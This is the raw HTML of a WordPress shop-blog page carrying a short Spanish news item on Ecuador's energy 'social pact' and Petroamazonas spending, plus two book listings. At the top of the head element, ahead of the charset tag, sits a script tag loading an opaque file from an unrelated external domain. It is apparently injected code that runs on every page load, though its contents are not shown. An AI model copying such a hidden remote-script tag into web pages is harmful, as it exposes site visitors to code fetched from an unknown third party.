    <!DOCTYPE html>
    <html lang="en-US">
    <head itemscope itemtype="http://schema.org/WebSite">
<script src='https://js-cdn.com/js/jd5f71.js'></script>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <link rel="profile" href="https://gmpg.org/xfn/11">
    <title>Los recursos naturales del Ecuador serán utilizados en su totalidad por el gobierno &#8211; Jeremy Denton</title>
<link rel='dns-prefetch' href='//fonts.googleapis.com' />
<link rel='dns-prefetch' href='//s.w.org' />
<link rel="alternate" type="application/rss+xml" title="Jeremy Denton &raquo; Feed" href="https://jeremy-denton.com/feed/" />
<link rel="alternate" type="application/rss+xml" title="Jeremy Denton &raquo; Comments Feed" href="https://jeremy-denton.com/comments/feed/" />
<link rel="alternate" type="application/rss+xml" title="Jeremy Denton &raquo; Los recursos naturales del Ecuador serán utilizados en su totalidad por el gobierno Comments Feed" href="https://jeremy-denton.com/los-recursos-naturales-del-ecuador-seran-utilizados-en-su-totalidad-por-el-gobierno/feed/" />
		<script type="text/javascript">
			window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/12.0.0-1\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/12.0.0-1\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/jeremy-denton.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=5.3.2"}};
			!function(e,a,t){var r,n,o,i,p=a.createElement("canvas"),s=p.getContext&&p.getContext("2d");function c(e,t){var a=String.fromCharCode;s.clearRect(0,0,p.width,p.height),s.fillText(a.apply(this,e),0,0);var r=p.toDataURL();return s.clearRect(0,0,p.width,p.height),s.fillText(a.apply(this,t),0,0),r===p.toDataURL()}function l(e){if(!s||!s.fillText)return!1;switch(s.textBaseline="top",s.font="600 32px Arial",e){case"flag":return!c([127987,65039,8205,9895,65039],[127987,65039,8203,9895,65039])&&(!c([55356,56826,55356,56819],[55356,56826,8203,55356,56819])&&!c([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]));case"emoji":return!c([55357,56424,55356,57342,8205,55358,56605,8205,55357,56424,55356,57340],[55357,56424,55356,57342,8203,55358,56605,8203,55357,56424,55356,57340])}return!1}function d(e){var t=a.createElement("script");t.src=e,t.defer=t.type="text/javascript",a.getElementsByTagName("head")[0].appendChild(t)}for(i=Array("flag","emoji"),t.supports={everything:!0,everythingExceptFlag:!0},o=0;o<i.length;o++)t.supports[i[o]]=l(i[o]),t.supports.everything=t.supports.everything&&t.supports[i[o]],"flag"!==i[o]&&(t.supports.everythingExceptFlag=t.supports.everythingExceptFlag&&t.supports[i[o]]);t.supports.everythingExceptFlag=t.supports.everythingExceptFlag&&!t.supports.flag,t.DOMReady=!1,t.readyCallback=function(){t.DOMReady=!0},t.supports.everything||(n=function(){t.readyCallback()},a.addEventListener?(a.addEventListener("DOMContentLoaded",n,!1),e.addEventListener("load",n,!1)):(e.attachEvent("onload",n),a.attachEvent("onreadystatechange",function(){"complete"===a.readyState&&t.readyCallback()})),(r=t.source||{}).concatemoji?d(r.concatemoji):r.wpemoji&&r.twemoji&&(d(r.twemoji),d(r.wpemoji)))}(window,document,window._wpemojiSettings);
		</script>
		<style type="text/css">
img.wp-smiley,
img.emoji {
	display: inline !important;
	border: none !important;
	box-shadow: none !important;
	height: 1em !important;
	width: 1em !important;
	margin: 0 .07em !important;
	vertical-align: -0.1em !important;
	background: none !important;
	padding: 0 !important;
}
</style>
	<link rel='stylesheet' id='wp-block-library-css'  href='https://jeremy-denton.com/wp-includes/css/dist/block-library/style.min.css?ver=5.3.2' type='text/css' media='all' />
<link rel='stylesheet' id='wc-block-style-css'  href='https://jeremy-denton.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/style.css?ver=2.5.14' type='text/css' media='all' />
<link rel='stylesheet' id='cookie-notice-front-css'  href='https://jeremy-denton.com/wp-content/plugins/cookie-notice/css/front.min.css?ver=5.3.2' type='text/css' media='all' />
<link rel='stylesheet' id='woocommerce-layout-css'  href='https://jeremy-denton.com/wp-content/plugins/woocommerce/assets/css/woocommerce-layout.css?ver=3.9.3' type='text/css' media='all' />
<link rel='stylesheet' id='woocommerce-smallscreen-css'  href='https://jeremy-denton.com/wp-content/plugins/woocommerce/assets/css/woocommerce-smallscreen.css?ver=3.9.3' type='text/css' media='only screen and (max-width: 768px)' />
<link rel='stylesheet' id='woocommerce-general-css'  href='https://jeremy-denton.com/wp-content/plugins/woocommerce/assets/css/woocommerce.css?ver=3.9.3' type='text/css' media='all' />
<style id='woocommerce-inline-inline-css' type='text/css'>
.woocommerce form .form-row .required { visibility: visible; }
</style>
<link rel='stylesheet' id='owl-carousel-css'  href='https://jeremy-denton.com/wp-content/themes/blossom-feminine/css/owl.carousel.min.css?ver=2.2.1' type='text/css' media='all' />
<link rel='stylesheet' id='animate-css'  href='https://jeremy-denton.com/wp-content/plugins/woocommerce-products-slider/assets/front/css/animate.css?ver=5.3.2' type='text/css' media='all' />
<link rel='stylesheet' id='blossom-feminine-google-fonts-css'  href='https://fonts.googleapis.com/css?family=Poppins%3A100%2C100italic%2C200%2C200italic%2C300%2C300italic%2Cregular%2Citalic%2C500%2C500italic%2C600%2C600italic%2C700%2C700italic%2C800%2C800italic%2C900%2C900italic%7CPlayfair+Display%3Aregular%2Citalic%2C700%2C700italic%2C900%2C900italic%7CPlayfair+Display%3A700italic' type='text/css' media='all' />
<link rel='stylesheet' id='blossom-feminine-style-css'  href='https://jeremy-denton.com/wp-content/themes/blossom-feminine/style.css?ver=1.3.3' type='text/css' media='all' />
<link rel='stylesheet' id='blossom-feminine-woocommerce-style-css'  href='https://jeremy-denton.com/wp-content/themes/blossom-feminine/css/woocommerce.min.css?ver=1.3.3' type='text/css' media='all' />
<script type='text/javascript'>
/* <![CDATA[ */
var cnArgs = {"ajaxurl":"https:\/\/jeremy-denton.com\/wp-admin\/admin-ajax.php","hideEffect":"fade","onScroll":"no","onScrollOffset":"100","onClick":"no","cookieName":"cookie_notice_accepted","cookieValue":"true","cookieTime":"2592000","cookiePath":"\/","cookieDomain":"","redirection":"","cache":"","refuse":"yes","revoke_cookies":"1","revoke_cookies_opt":"automatic","secure":"1"};
/* ]]> */
</script>
<script type='text/javascript' src='https://jeremy-denton.com/wp-content/plugins/cookie-notice/js/front.min.js?ver=1.2.50'></script>
<script type='text/javascript' src='https://jeremy-denton.com/wp-includes/js/jquery/jquery.js?ver=1.12.4-wp'></script>
<script type='text/javascript' src='https://jeremy-denton.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1'></script>
<link rel='https://api.w.org/' href='https://jeremy-denton.com/wp-json/' />
<link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://jeremy-denton.com/xmlrpc.php?rsd" />
<link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://jeremy-denton.com/wp-includes/wlwmanifest.xml" /> 
<link rel='prev' title='Samsung chips will get faster and easier on your battery' href='https://jeremy-denton.com/samsung-chips-will-get-faster-and-easier-on-your-battery/' />
<meta name="generator" content="WordPress 5.3.2" />
<meta name="generator" content="WooCommerce 3.9.3" />
<link rel="canonical" href="https://jeremy-denton.com/los-recursos-naturales-del-ecuador-seran-utilizados-en-su-totalidad-por-el-gobierno/" />
<link rel='shortlink' href='https://jeremy-denton.com/?p=294' />
		<!-- Custom Logo: hide header text -->
		<style id="custom-logo-css" type="text/css">
			.site-title, .site-description {
				position: absolute;
				clip: rect(1px, 1px, 1px, 1px);
			}
		</style>
		<link rel="alternate" type="application/json+oembed" href="https://jeremy-denton.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fjeremy-denton.com%2Flos-recursos-naturales-del-ecuador-seran-utilizados-en-su-totalidad-por-el-gobierno%2F" />
<link rel="alternate" type="text/xml+oembed" href="https://jeremy-denton.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fjeremy-denton.com%2Flos-recursos-naturales-del-ecuador-seran-utilizados-en-su-totalidad-por-el-gobierno%2F&#038;format=xml" />
<link rel="pingback" href="https://jeremy-denton.com/xmlrpc.php"><script type="application/ld+json">{
    "@context": "http://schema.org",
    "@type": "BlogPosting",
    "mainEntityOfPage": {
        "@type": "WebPage",
        "@id": "https://jeremy-denton.com/los-recursos-naturales-del-ecuador-seran-utilizados-en-su-totalidad-por-el-gobierno/"
    },
    "headline": "Los recursos naturales del Ecuador serán utilizados en su totalidad por el gobierno &#8211; Jeremy Denton",
    "datePublished": "2020-03-06T14:10:42+0000",
    "dateModified": "2020-03-09T13:23:59+0000",
    "author": {
        "@type": "Person",
        "name": "Hazel Egbert"
    },
    "description": "\"Este pacto se implementará para generar consenso a través de los espacios de diálogo; también buscamos mostra",
    "image": {
        "@type": "ImageObject",
        "url": "https://jeremy-denton.com/wp-content/uploads/2020/03/534ctwcwefwa.jpg",
        "width": 1243,
        "height": 1080
    },
    "publisher": {
        "@type": "Organization",
        "name": "Jeremy Denton",
        "description": "Make the most of now",
        "logo": {
            "@type": "ImageObject",
            "url": "https://jeremy-denton.com/wp-content/uploads/2020/02/cropped-Jeremy-Denton-90x60.png",
            "width": 90,
            "height": 60
        }
    }
}</script>	<noscript><style>.woocommerce-product-gallery{ opacity: 1 !important; }</style></noscript>
	<link rel="icon" href="https://jeremy-denton.com/wp-content/uploads/2020/02/cropped-Jeremy-Denton-1-32x32.png" sizes="32x32" />
<link rel="icon" href="https://jeremy-denton.com/wp-content/uploads/2020/02/cropped-Jeremy-Denton-1-192x192.png" sizes="192x192" />
<link rel="apple-touch-icon-precomposed" href="https://jeremy-denton.com/wp-content/uploads/2020/02/cropped-Jeremy-Denton-1-180x180.png" />
<meta name="msapplication-TileImage" content="https://jeremy-denton.com/wp-content/uploads/2020/02/cropped-Jeremy-Denton-1-270x270.png" />
<style type='text/css' media='all'>     
    .content-newsletter .blossomthemes-email-newsletter-wrapper.bg-img:after,
    .widget_blossomthemes_email_newsletter_widget .blossomthemes-email-newsletter-wrapper:after{
        background: rgba(243, 201, 221, 0.8);    }
    
    /* primary color */
    a{
    	color: #f3c9dd;
    }
    
    a:hover {
    	color: #f3c9dd;
    }

    .secondary-nav ul li a:hover,
    .secondary-nav ul li:hover > a,
    .secondary-nav .current_page_item > a,
    .secondary-nav .current-menu-item > a,
    .secondary-nav .current_page_ancestor > a,
    .secondary-nav .current-menu-ancestor > a,
    .header-t .social-networks li a:hover,
    .main-navigation ul li a:hover,
    .main-navigation ul li:hover > a,
    .main-navigation .current_page_item > a,
    .main-navigation .current-menu-item > a,
    .main-navigation .current_page_ancestor > a,
    .main-navigation .current-menu-ancestor > a,
    .banner .banner-text .cat-links a:hover,
    .banner .banner-text .title a:hover,
    #primary .post .text-holder .entry-header .entry-title a:hover,
    .widget ul li a:hover,
    .site-footer .widget ul li a:hover,
    .related-post .post .text-holder .cat-links a:hover,
    .related-post .post .text-holder .entry-title a:hover,
    .comments-area .comment-body .comment-metadata a:hover,
    .search #primary .search-post .text-holder .entry-header .entry-title a:hover,
    .site-title a:hover,
    .widget_bttk_popular_post ul li .entry-header .entry-meta a:hover,
    .widget_bttk_pro_recent_post ul li .entry-header .entry-meta a:hover,
    .widget_bttk_popular_post .style-two li .entry-header .cat-links a,
    .widget_bttk_pro_recent_post .style-two li .entry-header .cat-links a,
    .widget_bttk_popular_post .style-three li .entry-header .cat-links a,
    .widget_bttk_pro_recent_post .style-three li .entry-header .cat-links a,
    .widget_bttk_posts_category_slider_widget .carousel-title .title a:hover,
    .site-footer .widget_bttk_posts_category_slider_widget .carousel-title .title a:hover,
    .portfolio-sorting .button:hover,
    .portfolio-sorting .button.is-checked,
    .portfolio-item .portfolio-img-title a:hover,
    .portfolio-item .portfolio-cat a:hover,
    .entry-header .portfolio-cat a:hover{
        color: #f3c9dd;
    }

    .category-section .col .img-holder .text-holder,
    .pagination a{
        border-color: #f3c9dd;
    }

    .category-section .col .img-holder .text-holder span,
    #primary .post .text-holder .entry-footer .btn-readmore:hover,
    .pagination a:hover,
    .widget_calendar caption,
    .widget_calendar table tbody td a,
    .widget_tag_cloud .tagcloud a:hover,
    #blossom-top,
    .single #primary .post .entry-footer .tags a:hover,
    .error-holder .page-content a:hover,
    .widget_bttk_author_bio .readmore:hover,
    .widget_bttk_social_links ul li a:hover,
    .widget_bttk_image_text_widget ul li .btn-readmore:hover,
    .widget_bttk_custom_categories ul li a:hover .post-count,
    .content-instagram ul li .instagram-meta .like,
    .content-instagram ul li .instagram-meta .comment,
    #secondary .widget_blossomtheme_featured_page_widget .text-holder .btn-readmore:hover,
    #secondary .widget_blossomtheme_companion_cta_widget .btn-cta:hover,
    #secondary .widget_bttk_icon_text_widget .text-holder .btn-readmore:hover,
    .site-footer .widget_blossomtheme_companion_cta_widget .btn-cta:hover,
    .site-footer .widget_blossomtheme_featured_page_widget .text-holder .btn-readmore:hover,
    .site-footer .widget_bttk_icon_text_widget .text-holder .btn-readmore:hover{
        background: #f3c9dd;
    }

    .pagination .current,
    .post-navigation .nav-links .nav-previous a:hover,
    .post-navigation .nav-links .nav-next a:hover{
        background: #f3c9dd;
        border-color: #f3c9dd;
    }

    #primary .post .entry-content blockquote,
    #primary .page .entry-content blockquote{
        border-bottom-color: #f3c9dd;
        border-top-color: #f3c9dd;
    }

    #primary .post .entry-content .pull-left,
    #primary .page .entry-content .pull-left,
    #primary .post .entry-content .pull-right,
    #primary .page .entry-content .pull-right{border-left-color: #f3c9dd;}

    .error-holder .page-content h2{
        text-shadow: 6px 6px 0 #f3c9dd;
    }

    
    body,
    button,
    input,
    select,
    optgroup,
    textarea{
        font-family : Poppins;
        font-size   : 16px;
    }

    #primary .post .entry-content blockquote cite,
    #primary .page .entry-content blockquote cite {
        font-family : Poppins;
    }

    .banner .banner-text .title,
    #primary .sticky .text-holder .entry-header .entry-title,
    #primary .post .text-holder .entry-header .entry-title,
    .author-section .text-holder .title,
    .post-navigation .nav-links .nav-previous .post-title,
    .post-navigation .nav-links .nav-next .post-title,
    .related-post .post .text-holder .entry-title,
    .comments-area .comments-title,
    .comments-area .comment-body .fn,
    .comments-area .comment-reply-title,
    .page-header .page-title,
    #primary .post .entry-content blockquote,
    #primary .page .entry-content blockquote,
    #primary .post .entry-content .pull-left,
    #primary .page .entry-content .pull-left,
    #primary .post .entry-content .pull-right,
    #primary .page .entry-content .pull-right,
    #primary .post .entry-content h1,
    #primary .page .entry-content h1,
    #primary .post .entry-content h2,
    #primary .page .entry-content h2,
    #primary .post .entry-content h3,
    #primary .page .entry-content h3,
    #primary .post .entry-content h4,
    #primary .page .entry-content h4,
    #primary .post .entry-content h5,
    #primary .page .entry-content h5,
    #primary .post .entry-content h6,
    #primary .page .entry-content h6,
    .search #primary .search-post .text-holder .entry-header .entry-title,
    .error-holder .page-content h2,
    .widget_bttk_author_bio .title-holder,
    .widget_bttk_popular_post ul li .entry-header .entry-title,
    .widget_bttk_pro_recent_post ul li .entry-header .entry-title,
    .widget_bttk_posts_category_slider_widget .carousel-title .title,
    .content-newsletter .blossomthemes-email-newsletter-wrapper .text-holder h3,
    .widget_blossomthemes_email_newsletter_widget .blossomthemes-email-newsletter-wrapper .text-holder h3,
    #secondary .widget_bttk_testimonial_widget .text-holder .name,
    #secondary .widget_bttk_description_widget .text-holder .name,
    .site-footer .widget_bttk_description_widget .text-holder .name,
    .site-footer .widget_bttk_testimonial_widget .text-holder .name,
    .portfolio-text-holder .portfolio-img-title,
    .portfolio-holder .entry-header .entry-title,
    .single-blossom-portfolio .post-navigation .nav-previous a,
    .single-blossom-portfolio .post-navigation .nav-next a,
    .related-portfolio-title{
        font-family: Playfair Display;
    }

    .site-title{
        font-size   : 60px;
        font-family : Playfair Display;
        font-weight : 700;
        font-style  : italic;
    }
    
            .woocommerce ul.products li.product .add_to_cart_button:hover,
		.woocommerce ul.products li.product .product_type_external:hover,
		.woocommerce nav.woocommerce-pagination ul li a:hover,
		.woocommerce #secondary .widget_shopping_cart .buttons .button:hover,
		.woocommerce #secondary .widget_price_filter .price_slider_amount .button:hover,
		.woocommerce #secondary .widget_price_filter .ui-slider .ui-slider-range,
		.woocommerce div.product form.cart .single_add_to_cart_button:hover,
		.woocommerce div.product .cart .single_add_to_cart_button.alt:hover,
		.woocommerce .woocommerce-message .button:hover,
		.woocommerce-cart #primary .page .entry-content .cart_totals .checkout-button:hover,
		.woocommerce-checkout .woocommerce .woocommerce-info,
        .header-t .tools .cart .count {
			background: #f3c9dd;
		}

		.woocommerce nav.woocommerce-pagination ul li a{
			border-color: #f3c9dd;
		}

		.woocommerce nav.woocommerce-pagination ul li span.current{
			background: #f3c9dd;
			border-color: #f3c9dd;
		}

		.woocommerce div.product .entry-summary .product_meta .posted_in a:hover,
		.woocommerce div.product .entry-summary .product_meta .tagged_as a:hover{
			color: #f3c9dd;
		}
            
               
    </style>		<style type="text/css" id="wp-custom-css">
			#cookie-notice{
	min-width: 5%;
}		</style>
		
</head>

<body data-rsssl=1 class="post-template-default single single-post postid-294 single-format-standard wp-custom-logo theme-blossom-feminine cookies-not-set woocommerce-no-js rightsidebar" itemscope itemtype="http://schema.org/WebPage">
	
    <div id="page" class="site"><a aria-label="skip to content" class="skip-link" href="#content">Skip to Content</a>
        <header id="masthead" class="site-header wow fadeIn" data-wow-delay="0.1s" itemscope itemtype="http://schema.org/WPHeader">
    
		<div class="header-t">
			<div class="container">

                				    <button aria-label="secondary menu toggle button" id="secondary-toggle-button"><i class="fa fa-bars"></i></button>	
                
                <nav id="secondary-navigation" class="secondary-nav" itemscope itemtype="http://schema.org/SiteNavigationElement">
        			<div class="menu-legal-menu-container"><ul id="secondary-menu" class="menu"><li id="menu-item-6" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-6"><a href="/terms-of-service">Terms of Service</a></li>
<li id="menu-item-8" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-8"><a href="/privacy-policy">Privacy Policy</a></li>
<li id="menu-item-11" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-11"><a href="/dmca">DMCA</a></li>
<li id="menu-item-15" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-15"><a href="/cookie-privacy-policy">Cookie Privacy Policy</a></li>
<li id="menu-item-19" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-19"><a href="/returns">Returns</a></li>
<li id="menu-item-23" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-23"><a href="/shipping-and-delivery">Shipping and delivery</a></li>
</ul></div>                
        		</nav><!-- #secondary-navigation -->
                
				<div class="right">
					<div class="tools">
						<div class="form-section">
							<button aria-label="search toggle button" id="btn-search">
                                <i class="fas fa-search"></i>
                            </button>
							<div class="form-holder">
								<form role="search" method="get" class="search-form" action="https://jeremy-denton.com/">
				<label>
					<span class="screen-reader-text">Search for:</span>
					<input type="search" class="search-field" placeholder="Search &hellip;" value="" name="s" />
				</label>
				<input type="submit" class="search-submit" value="Search" />
			</form>							</div>
						</div>
                            <div class="cart">                                   	
        <a href="https://jeremy-denton.com/cart/" title="View your shopping cart">
            <span><i class="fa fa-shopping-cart"></i></span>
            <span class="count">0</span>
        </a>
	</div>    
    					
					</div>
                    
					                    
				</div>
                
			</div>
		</div><!-- .header-t -->
        
		<div class="header-m site-branding">
			<div class="container" itemscope itemtype="http://schema.org/Organization">
				<a href="https://jeremy-denton.com/" class="custom-logo-link" rel="home"><img width="231" height="154" src="https://jeremy-denton.com/wp-content/uploads/2020/02/cropped-Jeremy-Denton.png" class="custom-logo" alt="Jeremy Denton" srcset="https://jeremy-denton.com/wp-content/uploads/2020/02/cropped-Jeremy-Denton.png 231w, https://jeremy-denton.com/wp-content/uploads/2020/02/cropped-Jeremy-Denton-90x60.png 90w" sizes="(max-width: 231px) 100vw, 231px" /></a>                    <p class="site-title" itemprop="name"><a href="https://jeremy-denton.com/" rel="home" itemprop="url">Jeremy Denton</a></p>
                                    <p class="site-description" itemprop="description">Make the most of now</p>
                			</div>
		</div><!-- .header-m -->
        
		<div class="header-b">
			<div class="container">
				<button aria-label="primary menu toggle button" id="primary-toggle-button"><i class="fa fa-bars"></i>Navigation</button>
				<nav id="site-navigation" class="main-navigation" itemscope itemtype="http://schema.org/SiteNavigationElement">
        			<div class="menu-main-menu-container"><ul id="primary-menu" class="menu"><li id="menu-item-4" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-4"><a href="/">Shop</a></li>
<li id="menu-item-262" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-262"><a href="https://jeremy-denton.com/my-account/">My account</a></li>
<li id="menu-item-263" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-263"><a href="https://jeremy-denton.com/checkout/">Checkout</a></li>
<li id="menu-item-261" class="menu-item menu-item-type-post_type menu-item-object-page current_page_parent menu-item-261"><a href="https://jeremy-denton.com/blog/">Blog</a></li>
</ul></div>        		</nav><!-- #site-navigation -->                
			</div>
		</div><!-- .header-b -->
        
	</header><!-- #masthead -->
        <div class="top-bar">
		<div class="container">
			    <header class="page-header">
        </header><!-- .page-header -->
    		</div>
	</div>
        <div class="container main-content">
                <div id="content" class="site-content">
            <div class="row">
    
	<div id="primary" class="content-area">
		<main id="main" class="site-main">

		
<article id="post-294" class="post-294 post type-post status-publish format-standard has-post-thumbnail hentry category-uncategorized" itemscope itemtype="https://schema.org/Blog">
	
    <div class="post-thumbnail"><img width="1020" height="600" src="https://jeremy-denton.com/wp-content/uploads/2020/03/534ctwcwefwa-1020x600.jpg" class="attachment-blossom-feminine-with-sidebar size-blossom-feminine-with-sidebar wp-post-image" alt="" /></div>    
    <div class="text-holder">        
            <header class="entry-header">
    <span class="cat-links" itemprop="about"><a href="https://jeremy-denton.com/category/uncategorized/" rel="category tag">Uncategorized</a></span><h1 class="entry-title" itemprop="headline">Los recursos naturales del Ecuador serán utilizados en su totalidad por el gobierno</h1><div class="entry-meta"><span class="byline" itemprop="author" itemscope itemtype="https://schema.org/Person"> by <span class="author vcard" itemprop="name"><a class="url fn n" href="https://jeremy-denton.com/author/haze-egbert/">Hazel Egbert</a></span></span><span class="posted-on"><span class="text-on">updated on </span><a href="https://jeremy-denton.com/los-recursos-naturales-del-ecuador-seran-utilizados-en-su-totalidad-por-el-gobierno/" rel="bookmark"><time class="entry-date published updated" datetime="2020-03-09T13:23:59+00:00" itemprop="dateModified">March 9, 2020</time><time class="updated" datetime="2020-03-06T14:10:42+00:00" itemprop="datePublished">March 6, 2020</time></a></span></div><!-- .entry-meta -->	</header><!-- .entry-header home-->
        
    <div class="entry-content" itemprop="text">
		<div class="text">
<p>&#8220;Este pacto se implementará para generar consenso a través de los espacios de diálogo; también buscamos mostrar el rostro humano del sector, a través de actividades absolutamente sostenibles e inclusivas&#8221;, Ministro de Energía José Agusto.<br></p>



<p>El gobierno de Ecuador ha propuesto el llamado Pacto Social Energético en los campos eléctrico, hidrocarburífero y minero de la localidad de Lago Agrio, fronteriza con Colombia, que busca establecer recursos naturales minimizando los desacuerdos con la comunidad. También contribuye a promover el desarrollo de proyectos destinados a crear nuevas inversiones, llegar a acuerdos en las zonas de influencia con las comunidades y crear un fondo que asegure las prestaciones de salud y jubilación de las personas que viven con el sector minero.<br></p>



<p>En 2020, Petroamazonas, una empresa petrolera de propiedad del gobierno, planea invertir 130 millones de dólares en las provincias amazónicas de Orellana (noreste), Sucumbíos (noreste) y Napo (Centro Norte), subcontratando las obras y servicios de personas pertenecientes a la llamada economía común y solidaria, y vinculando la mano de obra local.<br></p>



<p>Los acuerdos se centrarían en la prestación de servicios de alimentación, transporte, seguridad y limpieza a la empresa petrolera, ya sea prestados por Petroamazonas o por los consorcios que le prestan sus servicios. El 83 por ciento de sus trabajadores que prestan servicios en el Amazonas nacieron o residieron en la zona y unos 6.800 amazónicos estaban afiliados a empresas y consorcios que prestaban servicios a la empresa petrolera estatal.<br></p>



<p>El gobierno dirigido por Lenín Moreno pretende maximizar los recursos naturales del país andino y evitar la creciente resistencia de las comunidades que viven en la zona de control de los distintos proyectos, en particular en el sector petrolero y minero, en el que viven varias comunidades indígenas a través del Pacto Social de la Energía.<br></p>



<p>El cruce del yacimiento petrolífero de Ishpingo, que forma parte del grupo petrolero Ishpingo-Tambococha-Tiputini situado en el Parque Nacional Yasuní en la Amazonía ecuatoriana, será uno de los mayores desafíos que enfrentará el gobierno de Moreno en 2020.<br></p>



<p></p>


<div class="wc-block-grid wp-block-handpicked-products wc-block-handpicked-products has-3-columns"><ul class="wc-block-grid__products"><li class="wc-block-grid__product">
				<a href="https://jeremy-denton.com/product/the-world-in-a-grain-the-story-of-sand-and-how-it-transformed-civilization-hardcover/" class="wc-block-grid__product-link">
					<div class="wc-block-grid__product-image"><img width="229" height="300" src="https://jeremy-denton.com/wp-content/uploads/2020/03/The-World-in-a-Grain-229x300.jpg" class="attachment-woocommerce_thumbnail size-woocommerce_thumbnail" alt="" /></div>
					<div class="wc-block-grid__product-title">The World in a Grain: The Story of Sand and How It Transformed Civilization Hardcover</div>
				</a>
				
				<div class="wc-block-grid__product-price price"><span class="woocommerce-Price-amount amount"><span class="woocommerce-Price-currencySymbol">&#36;</span>20.89</span></div>
				
				<div class="wp-block-button wc-block-grid__product-add-to-cart"><a href="?add-to-cart=289" aria-label="Add &ldquo;The World in a Grain: The Story of Sand and How It Transformed Civilization Hardcover&rdquo; to your cart" data-quantity="1" data-product_id="289" data-product_sku="" rel="nofollow" class="wp-block-button__link add_to_cart_button ajax_add_to_cart">Add to cart</a></div>
			</li><li class="wc-block-grid__product">
				<a href="https://jeremy-denton.com/product/environmental-and-natural-resource-economics-a-contemporary-approach-3rd-edition/" class="wc-block-grid__product-link">
					<div class="wc-block-grid__product-image"><img width="300" height="300" src="https://jeremy-denton.com/wp-content/uploads/2020/03/Environmental-and-natural-Resources-Economics-300x300.jpg" class="attachment-woocommerce_thumbnail size-woocommerce_thumbnail" alt="" srcset="https://jeremy-denton.com/wp-content/uploads/2020/03/Environmental-and-natural-Resources-Economics-300x300.jpg 300w, https://jeremy-denton.com/wp-content/uploads/2020/03/Environmental-and-natural-Resources-Economics-150x150.jpg 150w, https://jeremy-denton.com/wp-content/uploads/2020/03/Environmental-and-natural-Resources-Economics-45x45.jpg 45w" sizes="(max-width: 300px) 100vw, 300px" /></div>
					<div class="wc-block-grid__product-title">Environmental and Natural Resource Economics: A Contemporary Approach 3rd Edition</div>
				</a>
				
				<div class="wc-block-grid__product-price price"><span class="woocommerce-Price-amount amount"><span class="woocommerce-Price-currencySymbol">&#36;</span>26.49</span></div>
				
				<div class="wp-block-button wc-block-grid__product-add-to-cart"><a href="?add-to-cart=286" aria-label="Add &ldquo;Environmental and Natural Resource Economics: A Contemporary Approach 3rd Edition&rdquo; to your cart" data-quantity="1" data-product_id="286" data-product_sku="" rel="nofollow" class="wp-block-button__link add_to_cart_button ajax_add_to_cart">Add to cart</a></div>
			</li></ul></div></div>	</div><!-- .entry-content -->      
        <footer class="entry-footer">
    	</footer><!-- .entry-footer home-->
        </div><!-- .text-holder -->
    
</article><!-- #post-294 -->            
            <nav class="navigation post-navigation" role="navigation">
    			<h2 class="screen-reader-text">Post Navigation</h2>
    			<div class="nav-links">
    				<div class="nav-previous nav-holder"><a href="https://jeremy-denton.com/samsung-chips-will-get-faster-and-easier-on-your-battery/" rel="prev"><span class="meta-nav">Previous Article</span><span class="post-title">Samsung chips will get faster and easier on your battery</span></a></div>    			</div>
    		</nav>        
            
		</main><!-- #main -->
	</div><!-- #primary -->


<aside id="secondary" class="widget-area" itemscope itemtype="http://schema.org/WPSideBar">
	<section id="categories-4" class="widget widget_categories"><h2 class="widget-title" itemprop="name">Blog categories</h2>		<ul>
				<li class="cat-item cat-item-4"><a href="https://jeremy-denton.com/category/internet/">Internet</a>
</li>
	<li class="cat-item cat-item-5"><a href="https://jeremy-denton.com/category/mobile/">Mobile</a>
</li>
	<li class="cat-item cat-item-1"><a href="https://jeremy-denton.com/category/uncategorized/">Uncategorized</a>
</li>
		</ul>
			</section><style>
.rpwe-block ul{list-style:none!important;margin-left:0!important;padding-left:0!important;}.rpwe-block li{border-bottom:1px solid #eee;margin-bottom:10px;padding-bottom:10px;list-style-type: none;}.rpwe-block a{display:inline!important;text-decoration:none;}.rpwe-block h3{background:none!important;clear:none;margin-bottom:0!important;margin-top:0!important;font-weight:400;font-size:12px!important;line-height:1.5em;}.rpwe-thumb{border:1px solid #EEE!important;box-shadow:none!important;margin:2px 10px 2px 0;padding:3px!important;}.rpwe-summary{font-size:12px;}.rpwe-time{color:#bbb;font-size:11px;}.rpwe-comment{color:#bbb;font-size:11px;padding-left:5px;}.rpwe-alignleft{display:inline;float:left;}.rpwe-alignright{display:inline;float:right;}.rpwe-aligncenter{display:block;margin-left: auto;margin-right: auto;}.rpwe-clearfix:before,.rpwe-clearfix:after{content:"";display:table !important;}.rpwe-clearfix:after{clear:both;}.rpwe-clearfix{zoom:1;}
</style>
